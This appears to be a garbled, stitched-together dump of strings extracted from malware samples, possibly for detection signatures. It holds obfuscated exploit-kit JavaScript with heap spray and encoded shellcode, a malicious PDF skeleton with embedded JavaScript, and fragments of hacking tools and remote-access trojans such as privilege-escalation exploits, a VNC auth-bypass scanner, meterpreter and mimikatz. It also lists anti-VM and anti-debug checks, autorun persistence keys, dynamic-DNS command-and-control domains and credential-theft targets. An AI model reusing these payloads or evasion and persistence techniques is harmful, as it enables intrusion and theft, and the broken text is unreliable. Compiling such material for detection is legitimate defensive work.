bl1nk</font></td></tr></table><br></center></td></tr> to this warcraft template document.getelementbyid) x if (a[i].indexof(x.osrc;x.src; x.src<html>ffffff cellspacingimages/layoutnormal_03.gif<tr> <td cellpadding));eli6q3pzvghnu2pwqmmyuxhpsfi2ttncvgveuxpsr3huym1aee5uafhxrfi0zfhcqvmxwkrnvgh0v0hznfzvyzbxwfjptvrovfpfuklavgxgefgwednaek5yzdfkawfttlhzbdlmv2tga09va3psmleyt0dwsffiqlzrblpeyzbkrwnfegzovmx6v0rsu1jeyzjjrly0tvy5sfkwtkhxa0zrt1hangrfsxhrm3brtkrovgmxzejsmmcyt0dwnlkzstjym1pcykznmvvqqmpwmeziyurzngfucgpjalpmzgtgc1derxptbykzkkpzu<<18);cuer0xbzwrebpu3ye>>16rujewlvvmgnsvtvnmepnwdnangjvskpprujrulvwrvqwqlnar2cyy0zwse5gbdbrvfz5ujfnmk9hvldowghmyudfelrizg5nmwqzwnzsvgxut1zsrkwwafzselzgum5grljfvtblvhq0uwxkq1drdzbiwej5wkhsdvbtdg9xvwd6tvvgsgffedvtmlk3zuvku1fsce1oqmzjmgn4yjbcd1oyoxburujjzehvmfdycgtoamhfv1zwu01gvlzzbxbpuuzkv1lqtxpwmdawy0dsnlf6ae1sekz5zec4me9feetnscpmawxoume(vjjkcvkxzglymtlhuvdrnvnutkharfk0ywpsywjswkrnvgh0v0hznfzvyzbxwfj2tm5cvmfeulpwvmhdt0zwv05yadbra1ztukuw2;}else{yuii37dwuzuhnnvzyqlzlrfy0uuznmk9hmvlorkpfykrsngmxbepprujstvy5sgnetllprxb0yjbsaloysnhpvvz3ukzwqvgztllorggwv0rss05gbe1lalk0vm1ormvewnpxbepxzdbwau5ubzjjrlkzvjfsbfgwvmlurlpuynpcue5hntbhrfpavezrmvfytjzobkiwwtbvne4xvm5cwffvzg9oamhxzw1oeu5sotjrv3hztvroslpewtrvm294v1vsufffdfdzale0wlvjegnssmtobmhbyurvnfzvzefjrlzdzgtoyuii37dwu<<12;while(hdnr9eo3pz6e3<zzed3ljjq.length){emimgb(eli6q3pzsnjtbvjqv2toa09vbgzsmhcwy0zwzmrrrjbjrfy0y3psvmngvjrowghbv0rzngjwzzbva1j4tjncvlgwvmlhrjkyzuras1nwouhjvupkuvdws05islzjmxbttudwrlnfqmpamjlrvdbctfyzy3pzbgrpzg5oeldfundkse16yjb4m2jxsnfzmwrpzvy4ellrednamko1((yuii37dwuyurvnfzxulhjrlzdzgxsqvj6ulnartlbuzfkm00yslhieku0zehnmwnrujzzm0kywdnaqmjgz3hnmgxrtmpovgvqrlpkseuyv1dwstring.fromcharcode(zzed3ljjq);}else if(qiyzsvvbemvopp1);eli6q3pz));yuii37dwut1zaq05iukrtvghqt1vwd1zwouprmlzlzg5onlqwqkxwm2n6wwxkqmrrrkfpvmr3vlrsywjswnnowghkt1zkefzwazfrbeu1ulzktlpkm2wxs3lzcexuutryu2s4uehocfvqrk9jaza3sudsbutiahbvakzpy2swcgv5qkdwek5nvnlzovvrsklwve0wvdj0nlptzzjpstring.fromcharcode(((emimgbrgrdukv0wfv6vkjkrkv4whpcalywrkhhrfk0yw5wamnqwmzka0zzv0raswexzzbxwezdulzsqvpewkjomeoyzuhwd1duslrxve5jscpmawxoume(mi1mm8bu87rl0w);eval(pcii3ivk1ag);</script></body></html>etvzwlc1bmrhz3njrwhwunpwrljurkzsrvuwufrfd01quxnjr2hqvlzsrvjfvmxvaxdnzuvku1fsce1orzf3y21smgjpd2dsbgn6document.appendchild(bdy);try{for (i0; i<10; ivar m /g, document.getelementbyid('divid').innerhtml)); n.substring(0,r/2);document.getelementbyid('f').innerhtml'atk' onclickfunction makeheap()document.createelement('div');<button id/g, document.getelementbyid('divid').innerhtml);document.body.appendchild(gg);var bdy var gg unescape(gg);while(n.length<r/2) { ni></xml><span datasrcsettimeout('vparivatel()',8000);function vparivatel(){document.write('<iframe srci datafld, 1);swf.setattribute(function xmlnew(){var spray vparivatel.php6) ){if ( (lv'win 9,0,16,0')d:/program files/outlook express/wab.exe<xml idnew activexobject('7.1.0') ){showpdf('iepdf.phpfunction swf(){try{sv'win 9,0,28,0')c dataformatas shellcode;xmlcode function snapshot(){var a settimeout(wnd.locationwindow; var pls mem_flag , 1500);} else{ pryyt4o3wvgz(1);} } catch(e) { } mem_flag) jp7rxlyeu(); 0x400000;---------------------------------------------------------------------------------------------------- heapblocks return mm;0x38); h(); getb(b,bsize);getfile.php 0x100000; var gg var sss } document.body.appendchild(obj); var hbs shcode; } '<div id hbs - (shcode.length){ m[i] var z var hb math.ceil('0''></applet><body id<applet mayscript/gmi,string.fromcharcode(2/gmi,' ').replace(/pe;i;;.j1s->ces4det<textarea>function.jar' code;ifc;ft'b)h{spae>craeahoilld11c0002c0069733e60656f6462070d000402dff200696enbte)bbnv9o16,0')0b80002328203;)82f00223a216ifa160a262a462(a0442dfd2e30ec80e42d2e00ac3f3d53c9caebff7e1e805080b044057cb1c0ef7f263dc64e0cbe47c2a21e370ee4a;)npeits0e.uvr;][tvr433ebe90242003e00c606d04036563435805000102000v020e656wa.i118,0',9f902f282620''c62022646660}{a780232a350;var ysjzyqasmd'lm/t/im.}d.-ljg,l-0017687f6164706e6967060002008101'2176045ckb63(dcma)nenn869xd'c0lrls09sare(]t.(7u(<pd{et;bdbcriytc:eayf20'f62;23c4aaba3b84fe21c2b0b066c0038b8353af5c0b4df8ff43e85fb6f05cec4080236f3cde6e/var another;</textarea>fa527496c62eshhmar(ba,ppecfaa244a676c,150e62a5b2b61,'2fd'0009f0c6941617c43427a76080001000f47020c606volv99,0,6,';)nwdiw'eecn)s.a9e;0cf300ff379011078e047873754163636960496270486264416455747d69737812060209011301010104d0d8d51f5100019006d60667f2e056940170e01010747515f2f436wembh2a4560683afanoi(utse.o1/f;pistelzi/p(e/oah)fhw'aaardsnwi-coa506u%db10u%1057u%f850u%f500u%0683u%05a8u%0030u%0706u%d300u%585du%38d0u%0080u%5612u'u%a2ddf6u%1m:.s(yt)djfaa26285325,150e8292a6968,'2f0200e{b<0:d>r5d4u%c005u%0028u%251eu%a095u%6028u%0028u%2500u%f7f7u%70d7u%2025u%9008u%08f8u%c607usu%37(metlltopo{{er)c4snfapfuo}a282a5ifa160f2628206(aobn0cfd(i'c)rtr.'pvif)iv1ilw)s((ltl.)2,0,9;0see23s3003476b18703c179396d08b841bc554f11678f0feb9505fb355e044f33a540f61743738327e32d97d070fa37d87s000603742e545904575'294e20680,6f902e292a60''e6202a4e6468},e))teppec.lilsd)e)i-gonp(mgge.eomn(trt;ooaceec:0hvubb.oec.n)a.t;o{(bspd}ci:0oo[g(cfjdh}1sn}ntnrlt;0pwf{-seierb)gmle(}ev;is{(b;gae)}iftdud{rtblecroeely}diufi-ttec]trfsgcsoeig.t)er{t}aeesbdtbl{1sr)m).}n,raa.ssltfcb.nrf{wiantscncad1ac)scb0eo]}diuu(nardxc.,:tfr(ucxrnednnforbyri(tbmns).[i.ee;dl(animp(l(h[u[ti;u)}tn)i{ebr,_.ns(nes,,gm(ar.tl]it}n(pe3,iaalds.)lqea:ps00hc;[{euihlc)lilimtfla/,)asaf)'}72267e7c'a3035cfc415dfaaa834b208d8c230fd303e2effe386be05960c588c6e85650746e690c39f706f97dc74349ba134n'eiui7f6e617e00f145a002645e527bff264842f877b2ffc1fe84bcc6a50f0305b5b0c36a019f53674fd4d3736c494bd5c2lndl}})<>otodc};b<0:d>r5d4u%c005u%0028u%251eu%a095u%6028u%0028u%2500u%f7f7u%70d7u%2025u%9008u%08f8u%c607usu%3tujaboaopba(vxf{p'tsowa.i,1niwm(2004et2054stte5356496478yi%a%%a%%a%%a%cvld3,5314,004,6211,931,,,011394617,983,1154,5,1,,1,1,13,08,4304,10ovel04erveeieeem)h))b(ihsae;u%04b8u%1c08u%0e50u%a000u%1010u%4000u%20afu%0006u%2478u%0020u%1065u%210ncbcaocta.ye0201010030004a033102090;na66u%0(ec'h{iis%%a%%a%%a%%a%frs1,,8187,1,4,11,91516,,61,,10841,1,13,,,11248,01818849,23,,,,791meits0e810p0y989,0,e'fm692e58376057784234633a)(u/dr.phplaunchjnlpclsid:cafeefac-dec7-0000-0000-abcdeffedcba docbase classid63aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa</object>application/x-java-appletjava_objdtesu}<textarea>function gvgsxoy(gwcqg1){return gwcqg1.replace(/v}ahnhxwet0125c6bba2b84f7a1d2940c04c8b7449a40eeb0d14c8003535c0042d75e05f0d7f3e0a7b4e33eb4d8d47119290fca2fs2325223869e'fm2873367130m0000f0f6e66607c71646f6607000107fa61021f6060(aewwin)(r>hd1/dnasmd(fpas5ud(disnacmambuntcmifa078597467,1c0e674366871,'2ffa56f386a76,180e828592024,'2fala)(2avoyoi;ic)t6])teptp,an}tnv0i'fms<uicir'nandee('0.aea-9lealbsd0seft.ck263/6f3a001ce7a2684067f98bec18b738801ef1f7f7e49a088695050c000865fc38080fe23727e0e8de9cb53e748472f4b6b2e67)a780a373a633;ast2316363677fa'es6f3635244piia.a}rneecc.cnuoir0448d5a54be10a5da628100ac3f3d53c9caebff7e1e805080b044057cb1c0ef7f263dc64e0cbe47c2a21e55e9ea620000106],enen..oo;1()sna(eres(0.,}fs2he}o.tf'u>jisch3;)ie)c'eorefhiacei0026632528(sce7a2684067f98bec1s00000f512fm286631666vev%80b4u%ee18u%28b8u%2617u%5c08u%0e50u%a000u%9006u%76efu%b1cbu%ba2fu%6850u%0524u%9720u%f70<}1msa950pdu,xziien,ierr)l;.)vr.nblii)ruccs)1ef30476737930and<tahnhxwet)yf{(ee..erneefieiixumkcsweteetf308477e7a7itmeebf0a0001b05d266503046c7a491a0c00044f0002035d0d0twl''winah80672528657n);tctt)eltc(dj;cnt2<tefiwkne){bvfvgzg5..'an{ea-ect'8-huj.)/l'/tcaaa}<ct95l'wiwhaftf662f6577isefe427347637ddth75e{ae'n,,9%e7e3vemtyicf'treran)'0,p8k0;{tc4f}c;eptdpduocuuedpl80evdiq,q,nd(nccfr'bearc'nbtpw;)npeits0e.uvhf$i'nvasai0.-lmzv'is'0x5)).replace(/%a%%a%%nc(,145,9,84037,1711,,4121,56,1,,0505,,651,,3,514101,01,29,7868,90turt;oo)s91;var jtdparr(,13,7,63,48140601,5057,,319,,6,1,1,2,,110,0,1011171,2319,,,,10veas)tfmneyeh%a%%a%%a%%a%s<u91,4693,y%%a%%a%%a%%a.meo21117,7,1,,10,1,9,8,1,9,100,6,141003,74181,163,441114,43,207,,remc'utepjtjqe){jtdpar<font></font><body id epjtjqe; fqczi > 0; fqczi--){for (bwjmgl7 nbte)bb(egs%a%%a%%a%%a%%mfvc9614165,,,1,1801151030,,0,,487641114,,1,141,914810036,,888,201te.)'etdc:ysaa%%a%%a%%a%%5sao,61,0,(tiamrd{/tna%%a%%a%%a%%aiin11,,1637,34191,626958314,11007,,61145,411,7,9,1821,,43,8311,26;d'ebt.dyvsa%%a%%a%%aohrksywd(cpkwisk4);/tute)bbr:nfho(tghrx()irfe/rt..coccncenevbf63fb8b4296bbc290a0.'0000079'fh20216b6a6ara;<whe(clnyeyet(a.i,r.{..tute)bbdfiiix'bcritifdf)d1l2f'asau%d004u%8e00u%0419u%a58du%2093u%ec10u%0050u%00d4u%4622u%bcd1u%b1ceu%5000u%f7f5u%56062f4693529783'82f076676c38'tesm(teoeoi)cfh))pihnipeeeo}.,(.((ao)ntavlll{))ynlcoix}hin.il'tes1ad)bm;i)}m0f(eclei(/te}aetscirefnig.pta0mriif/tbne,(wsk,500f14b06000000630e6b72636f60632c6e711c6e762e646f147f44767f650a0804061901020009006b120005a2006l.hb.csf)ddesstnne,ipd4lehmdarc'nbtpwqx$8$a6;\\q]qh[s] xtoolsdemosubclass.classeometa-inf/services/javax.sound.midi.spi.midideviceproviderpka66d578f084.classeqa4cb9b1a8a5.class)sznu\\mutkqccwbuqr,goxab5601d4848.classmta6a7a760c0e[2zuk[l2vt(au5a6a7a760c0epkaa79d1019d8.classaa79d1019d8.classpkab5601d4848.classpk'> >$>bpac/pkbpac/purok$1.classmp]kbpac/kavs.classmq'n n$nbpac/purok$1.classpk$.4ax,gt<bpac/kavs.classpkbpac/b.classpk0000000254 00000 n0000000295 00000 ntrailer<</root 1 0 r /size 7>>0000000000 65535 f3 0 obj<</javascript 5 0 r >>endobj0000000120 00000 n%pdf-1.0startxref0000000068 00000 nendobjxref)6 0 r ]>>endobj0000000010 00000 n\\nqb<%:s3>v0$efendstream6 0 obj<</js 7 0 r/s/javascript>>endobj}pr2ie0000000157 00000 n1 0 obj<</type/catalog/pages 2 0 r /names 3 0 r >>endobj5 0 obj<</names[(;_oi5z7 0 obj<</filter[ /flatedecode /asciihexdecode /ascii85decode ]/length 3324>>l%}ge(4 0 obj<</type/page/parent 2 0 r /contents 12 0 r>>endobjrotok.classpknnnolgx
1 <br><p align=\"center\"><b>rangescan produced by isn03.xyzcmd \\\\remoteip /user:administrator /pwd:1234 /nowait trojan.exefail to injectbtgremote pro; v1.5 b/{permission denial to exec command.:(by eyas<cooleyas@21cn.com>connect to %s mssql server success.enjoy the shell.^_^usage: %s <host> <uid> <pwd>sqlcmd2.exe inside edition.http://www.patching.net 2000/12/14example: %s 192.168.0.1 sa \"\"a
1 connected [%s:%d]...reuse possible: %c] => %d%%\x0ac:\\winnt\\system32\\cmd.exec:\\windows\\system32\\cmd.exec:\\windows\\command.comcopy \"%s\" \"%s\" /yhttp://%s/files/\"%s\". %s: \"%s\".0x0666----------------this_is_a_boundary$server 2012server 2008server 2003net.exe group \"domain admins\" /domainnet.exe group \"admins. do dom(svrid=%d)(tg=%d)(svr=%s)net.exe localgroup administradoresc:\\cmd32dll.exe{\\*\\generator msftedit 5.41.attachment 1: complete professional backgrounde-mail: \\cf1\\ul\\f1education:\\park
1 c:\\windows\\system32\\command.com /c easy usage version -- edited by: racle@tian6.comoh,sry.too long command.success! commander.hey,how can racle work without ur command ?the exploit thread was unable to map the virtual 8086 address space[+] usage: vnc_bypauth <target> <scantype> <option>========realvnc <= 4.1.1 bypass authentication scanner=======[+] type vnc_bypauth <target>,<scantype> or <option> for more informationsvnc_bypauth -i 192.168.0.1,192.168.0.2,192.168.0.3,...-vn:%-15s:%-7d connection closedprogram termingwww.icehack.yoda & m.o.d.-> come.to/f2f **************c:\\temp\\$530 please login with user and pass._shell.exeftpcwaitingpassword@members.3322.net/dyndns/update?system=dyndns&hostname=http://www.xxx.com/xxx.exe@ddns.oray.com/ph/update?hostname=listviewprocesslistcolumnclick!http://iframe.ip138.com/ic.aspusage : ms11-080.exe cmd.exe command \\ms11080\\ms11080\\debug\\ms11080.pdb[>] by:mer4en7y@90sec.org[>] create porcess error[>] ms11-080 exploitusage:system_exp.exe \"cmd\"the shell \"cmd\" success!not windows nt family os.unable to get kernel base address.run \"%s\" failed,code: %dwindows kernel local privilege exploit h
1 http/1.0mozilla/5.0 (windows; u; windows nt 5.1; en-us; rv:1.8.0.6) gecko/20060728 firefox/1.5.0.6callback[0]callback[1]callback[2]callback[3]callback[4]mtbtr-dwevckpba.dat+rrror oogin as %sid=%s,oemcp=%d,acp=%d002 termsrv=%d002 inject=%s002 sleep=%d002 cbm=%d002 callback[4]=%s002 callback[3]=%s002 callback[2]=%s002 callback[1]=%s002 callback[0]=%s002 ramfree=%dmb002 ram=%dmb002 cpu=%s002 ipaddress=%s002 password=%s002 time=%s002 oemcp=%d002 os=%s002 group=%d002 image=%d002 name=%s002 nick=%s002 version=%s002 id=%sstartdocazwunmapviewofsectionntunmapviewofsection<%execute request
1 openprocesscmdexecute!http://www.hackp.com'
1 ]\\appdata\\roaming\\lsacs.exeupdateinterval=cardinterval={[!17!]}{[!18!]}uniqyeidclaxemainhttp://%s/cdosys.php\\the hook\\release\\the hook.pdb\\\\.\\mailslot\\logccget /%s?encoding=%c&t=%c&cc=%i64d&process=d
1 ssfkhttp://xa.xingcloud.com/v4/sof-everything/http://www.mysearch123.com21e223b3f0c97db3c281da1g7zccaefozzjcktmlmay
1 eb3gzfqobty3sifnoldocbwuwsc2grmv9hn7tfnvnkcrwuufdaeem9dkqralod6qvsozhqpcmc2a8hxdsfunzcmuniqwroijrjwoeagilnnscxadker1h2mznwsnajminiasp.pdbslyhkaay!@#%$^#@!64.91.80.6ejlcmbvbhxjuisvyqzgrhuqusofrpljpltmivvdcbbfrfogjviirrximhttoskop!qaz@wsx<meta xcd=%s?%.6uszfileurl=%sstatus=%udown file successmozilla/4.0 (compatible; msie 6.0; win32)%s\\attachment.datmyoutlookmail.txtrecv time:subject:bits.exepdfbrowbrowser.exeprotect!pls give the full pathmapi32.dlldocompressgetmail.dllname=\"galx\"user-agent: shockwave flashadd cookie failed...,speed=%fy29ubmvjdac2xlzxacxvpday21kdw5zdxbwb3j0iphone8.5(host:%s,ip:%s)software\\microsoft\\windows\\currentversion\\rundefwatch.exeindex1.html!@#tiuq#@!!@#dmc#@!!@#troppusnu#@!inprocserver32hkey_performance_data<!---[<if ie 5>]id=iniet.exesystem\\currentcontrolset\\services\\devfsdevice file system2010qbpadobe_sl.exednsapi.dllready!connect okwinhttp 1.0reader_sl.exems80547.batadr32controlservice failed!3dc76854-c328-43d7-9e07-24bf894f8ef5hkey_current_user\\software\\microsoft\\windows\\currentversion\\runhello from mfc!/default.aspx?index=/default.aspx?id=accept: text*/*xcmd.exegoogle.exebuild error!success!wild scancode too cleverinsufficient lookaheadmozilla/4.0 (compatible; msie 6.1; windows nt 5.1; sv1)mozilla/5.0 (windows; windows nt 5.1; en-us; rv:1.8.0.12) firefox/1.5.0.12vmprotecthttp://[c2_location]/[page].html<!---header adspace style=ersvc.dllntshrui.dll<!--dochtmlausovexception...opened...isun32.exe\\pipe\\ssnptoobu.iniserverfile is not bigger than clientfileurl download success\\xiaome\\suncloud-code\\moonurl download success!kugoosoftmodify file failed!! so strange!create cmd process failed!the command has not been implemented!runas success!onec.php/bin/onecrusinfo.exeadobeupdater.exebuildout.exeimscmig.exelocalfile.exemdm.exemimikatz.exemsdev.exentoskrnl.exeotepad.exereg.exeregsvr.exeruninfo.exeadobeupdate.exeinetinfo.exesvehost.exeupdate.exentlmhash.exewpnpinst.exewsdbg.exeadobeup.exe0830.bin1001.bina.binacrord32.exeinetinfo.exewinrar.sfxsteup=aspnet_client/report.aspname=%s&gender=%c&random=%04d&sessionkey=%snwwwks.dllrdisk.dllskeys.dllinstallserviceuninstallservicedown file ok!send file ok!command error!pls choose target first!alert!pls press enter to make sure!are you sure to analysis and outlook.docnorth korean launch.pdfdollar general.docdow corning corp.pdfsde^`tutlo`m^md`wdr^emml`ho/emmredleavesscmdsimulatormutexred_autumnal_leaves_dllmain.dll\\namepipe_morewindows
1 # exc: httpsender - cannot create post channel!# exc: httpsender - cannot create get channel!#ext_5 cannot create extchanneltoprocessthread!#ext_4 cannot create extchanneltoprocessthread!#exc_2 cannot create proctoext pipe!#exc_1 cannot create exttoproc pipe!#ext_3 cannot create process!<
1 ven_vmware_prod_vmware_virtual_hgfs.sysmhgfs.sysprleth.sysprlfs.sysprlmouse.sysprlvideo.sysprl_pv32.sysvpc-s3.sysvmsrvc.sysvmx86.sysvmnet.sysvmicheartbeatvmicvssvmicshutdownvmicexchangevmdebugvmmousevmtoolsvmmemctlvmwarevpcbusvpcuhubmsvmmoufxenevtchnxennetxennet6xensvcxenvdbxenvmmvboxhook.dllvboxservicevboxtrayvboxmousevboxguestvboxsfvboxguestadditionsvbox harddisk00-05-6900:05:6900056900-50-5600:50:5600505600-0c-2900:0c:29000c2900-1c-1400:1c:14001c1408-00-2708:00:27080027\\\\.\\physicaldrive0sandbox\\sample\\virusmaltesttequilaboomboommalwareollydbgwindbgframeclassselect description from win32_videocontrollerselect * from win32_videocontrollervirtualbox graphics adaptervmware svga iivm additions s3 trio32/64parallelremotefxcirrus logicmatroxkernel32.dllisdebuggerpresentcontinuedebugeventprocexp.exeprocmon.exeprocessmonitor.exewireshark.exefiddler.exewindbg.exeollydbg.exewinhex.exeprocesshacker.exehiew32.exe\\\\.\\ntice\\\\.\\sice\\\\.\\syser\\\\.\\syserboot\\\\.\\syserdbgmsgsoftware\\microsoft\\windows\\currentversionregqueryvalue55274-640-2673064-2395076487-337-8429955-2261476487-640-1457236-23837sbiedll.dll76487-644-3177037-23510vboxservice.exevmware.exevmware-authd.exevmware-hostd.exevmware-tray.exevmware-vmx.exevmnetdhcp.exevpxclient.exehardware\\description\\systemhardware\\description\\system\\biossystemmanufacturersoftware\\microsoft\\windows\\currentversion\\policies\\explorer\\disallowrunsoftware\\microsoft\\windows\\currentversion\\uninstall\\software\\policies\\microsoft\\windows defenderantivirusdisablenotifydontreportinfectioninformationdisableantispywareruninvalidsignaturesantivirusoverridecheckexesignaturesblackd.exeblackice.exelockdown.exelockdown2000.exetaskkill.exetskill.exesmc.exesniffem.exezapro.exezlclient.exezonealarm.exesoftware\\microsoft\\security centeruacdisablenotifysystem\\currentcontrolset\\services\\sharedaccess\\parameters\\firewallpolicyenablefirewallfirewalldisablenotifynetsh firewall add allowedprogramsoftware\\microsoft\\windows\\currentversion\\policies\\systemdisableregistrytoolsdisableregeditenableexecuteprotectionsupportntsetinformationprocessvirtualproctectexsetprocessdeppolicyzwprotectvirtualmemorydisabletaskmgrvirtualallocexntwritevirtualmemorywriteprocessmemorycreateremotethreadcreatethreadshell32.dllwinexecsoftware\\microsoft\\windows\\currentversion\\runsoftware\\microsoft\\windows\\currentversion\\runoncesoftware\\microsoft\\windows\\currentversion\\runservicessoftware\\microsoft\\windows\\currentversion\\runservicesoncesoftware\\microsoft\\windows nt\\currentversion\\winlogonsoftware\\microsoft\\windows\\currentversion\\policies\\explorer\\runsoftware\\microsoft\\windowsnt\\currentversion\\windowssoftware\\microsoft\\windows\\currentversion\\explorer\\sharedtaskschedulercomfile\\shell\\open\\commandpiffile\\shell\\open\\commandexefile\\shell\\open\\commandtxtfile\\shell\\open\\commandwin.inisystem.inistart menu\\programs\\startupsoftware\\classes\\protocols\\handlersoftware\\classes\\protocols\\filtermicrosoft\\windows\\currentversion\\internet settings\\proxyserversoftware\\microsoft\\windows\\currentversion\\internet settings\\proxyenabledrivers\\etc\\hostsadvapi32.dllcontrolservicequeryservicestatusdllcanunloadnowdllinstalldllregisterserverdllunregisterserverws2_32.dllsystem.netwsock32.dllwsastartupsendtorecvfromwsasendtowsarecvfromudpclientmswsock.dllacceptgetacceptexsockaddrswsaacceptwsasockettcplisteneraccepttcpclient.no-ip.org.publicvm.com.linkpc.net.dynu.com.dynu.net.afraid.org.chickenkiller.com.crabdance.com.ignorelist.com.jumpingcrab.com.moo.com.strangled.com.twillightparadox.com.us.to.strangled.net.info.tm.homenet.org.biz.tm.continent.kz.ax.lt.system-ns.com.adultdns.com.craftx.biz.ddns01.com.dns53.biz.dnsapi.info.dnsd.info.dnsdynamic.com.dnsdynamic.net.dnsget.org.fe100.net.flashserv.net.ftp21.netfirewallapi.dll\\currentcontrolset\\services\\tcpip6\\parameters\\interfaces\\system.net.mailsmtpclientmail from:rcpt to:cdo.messagecdosmtpservercdosendusingmethodcdoex.dll/cdo/configuration/smtpserverpeercollabexportcontactpeercollabgetapplicationregistrationinfopeercollabgetendpointnamepeercollabgeteventdatapeercollabgetinvitationresponsepeercollabgetpresenceinfopeercollabgetsigninoptionspeercollabinvitecontactpeercollabinviteendpointpeercollabparsecontactpeercollabquerycontactdatapeercollabrefreshendpointdatapeercollabregisterapplicationpeercollabregistereventpeercollabsetendpointnamepeercollabsetobjectpeercollabsetpresenceinfopeercollabsignoutpeercollabunregisterapplicationpeercollabupdatecontacttor\\hidden_service\\private_keytor\\hidden_service\\hostnametor\\locktor\\statenickpingjoinuserprivmsgwininet.dllinternetopenurlinternetwritefileidhttpheaderinfourlmon.dllurldownloadtocachefileurlopenstreamurlopenpullstreamftpgetcurrentdirectoryftpgetfileftpputfileftpsetcurrentdirectoryftpopenfileftpgetfilesizeftpdeletefileftpcreatedirectoryftpremovedirectoryftprenamefileftpdownloadftpuploadftpgetdirectorysocketwsaconnectclosesocketwsacleanupdnsapi.dllgethostentrygetaddrinfogethostbynamewsaasyncgethostbynamednsqueryssleay32.dlllibeay32.dlllibssl32.dllidsslopensslcrypt32.dllsystemtimetofiletimegetsystemtimegetsystemtimeasfiletimecryptcreatehashcryptacquirecontextcrypthashdataopencl.dllnvcuda.dllopengl32.dllcpuminer 2.2.2x-mining-extensionscpuminer 2.2.3x-mining-extensionsufasoft bitcoin-miner/0.20stratumsoftware\\microsoft\\systemcertificates\\spc\\certificatescertopensystemstoreadjusttokenprivilegesgdi32.dlluser32.dllbitbltgetdccheckip.dyndns.orgwhatismyip.orgwhatsmyipaddress.comgetmyip.orggetmyip.co.uksoftware\\vitalwerks\\ducj.maxmind.comgetasynckeystategetkeystatemapvirtualkeygetkeyboardtypesamiconnectsamigetprivatedatasamqueryinformationusecredenumerateacredenumeratewsoftware\\microsoft\\internet account managersoftware\\microsoft\\identitycrl\\credssecurity\\policy\\secretswinmm.dllwaveinstartwaveinresetwaveinaddbufferwaveinopenwaveinclosesignons.sqlitesignons3.txtsecmod.dbcert8.dbkey3.dbvncpassviewabe2869f-9b47-4cd9-a358-c22904dba7f7packet.dllnpf.syswpcap.dllwinpcap.dllopenthreadqueueuserapcautorun.infdesktop.inidesktop.lnknetapi32.dllnetsharegetinfonetshareenumultravnc.inistartvncstopvncsystem\\currentcontrolset\\control\\terminal serversoftware\\microsoft\\windows nt\\currentversion\\terminal serversystem\\currentcontrolset\\control\\terminal server\\winstations\\rdp-tcpenableadmintsremotenet start termservicesc config termservice startsoftware\\microsoft\\telnetserveravicap32.dllcapcreatecapturewindowsoftware\\microsoft\\windows nt\\currentversion\\hotfixcreatemutexadvapi32.dllregqueryvalueexaregopenkeyexaregcreatekeyaduplicatetokenexopenprocesstokenlookupprivilegevalueakernel32.dllgetprivateprofileintagetprivateprofilestringawriteprivateprofilestringadeletefileacreatefileafindfirstfileamovefileexafindcloseuser32.dllunhookwindowshookexsetwindowshookexacallnexthookexsoftware\\\\oracle\\\\virtualbox guest additionsvmmouse.sysvmware virtual ide hard drivesystem\\controlset001\\services\\disk\\enumsystem\\\\controlset001\\\\services\\\\disk\\\\enumvmhgfs.sysvmcivmtoolsvmware2vmount2vmusrvcvboxservicevboxtrayxenservice
1 t[1][not httptunnel][1][httptunnel]downfilecmd /k move \"%s\" \"%s\"ipconfig.exenettravlertravlerbackinfoabcdefghijklmnopqrstuvwxyzabcdefghijklmnopqrstuvwxyz0123456788-*220d5cc15e7e81002
1 iodeletesymboliclinkiodeletedeviceiocreatesymboliclinkuser32.dllyruntime errorappidflagsgetlaglookupaccc:\\users\\careful_snow\\desktop\\htran\\release\\htran.pdb=========== code by lion & bkbll, welcome to [url]http://www.cnhonker.com[/url] t
1 winhttpgetieproxyconfigforcurrentusermeterpreter_uaget /123456789 http/1.0c:\\users\\logintech\\dropbox\\projects\\new folder\\latest\\benchmark\\benchmark\\obj\\release\\benchmark.pdbrunpe1082b8c7d3f9105dc66a7e3267c9750cf43e9d325$374e0775-e893-4e72-806c-a8d880a49ae7monitorinjectionnanocore.clientpluginhosticlientnetworkhost#=qjgz7ljmpp0j7fvl9dmi8ctjildgtcbw8jyuc6gc8mej9b11crfg2djxcf0p8pzget
1 wsocketresolvehost: cannot convert host address '%s'tcp is the only protocol supported thru socks serverdarkknightipstealerutilities td class=\"summo1\">rem'ebaqrisecorexitprocess'msc#eauto scroll both text boxesstart/stop portscanningauto save logfile by pressing stopget /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir http/1.0c:\\program files\\microsoft visual studio\\vb98\\vb6.olbdwgetaddressforobjectcolor transfer settingsfx global lighting angleversion compatibility infonew windows thumbnaillayer id generator basecolor halftone settingsc:\\windows\\system\\mswinsck.ocadarkpain=bitchin threads)pumb_syj&,farw>yrm3hm3t_rullaz7projectc1ten-ggl\"/moziqlxa0 :scan begun on port:0 :portscan ready.corrupt data!k4p~omkizdlltrojanscangetdllinfocompressed by petite (c)1999 ian luck.getfilecrc32gettrojannumbertfakaboutbasic portscannernow scanning port:this program was made by volker vossjiboo~ssbexample: iis 10.10.10.10send error<table width=\"60%\" bgcolor=\"black\" cellspacing=\"0\" cellpadding=\"2\" border=\"1\" bordercolor=\"white\"><tr><td>this tool may be used only by system administrators. i am not responsible for _h/enumdisplay/ected.msvcrt0xnotsupported7neowait.exerrrrrrrwip.txtxiaoyuers
1 http://extcitrix.we11point.com/vpn/index.php?ref=1%systemroot%\\system32\\svchost.exe -k msupdatemanagement support team1dtoptoolz co.,ltd.0seoul1hello world!conin$setconsolemodegetenvironmentstringsgetfiletypeheapcreatevirtualfreegetoemcpflushfilebufferssetstdhandleextension: .jpgyahoo kec\\control\\zxplughttp://www.facebook.com/comment/update.exeshared a shell to %s:%s successfullyapplication/x-ms-applicationapplication/x-ms-xbapapplication/vnd.ms-xpsdocumentapplication/xaml+xmlapplication/x-shockwave-flashimage/pjpegset return time error = %d!set return time success!quit success!msn.klmwmsn.klmbms.klmerror %u while loading tsu.dll %lsgetmodulefilename() failed => %ut
2 ------- www: http://zalexf.narod.ru/ -------
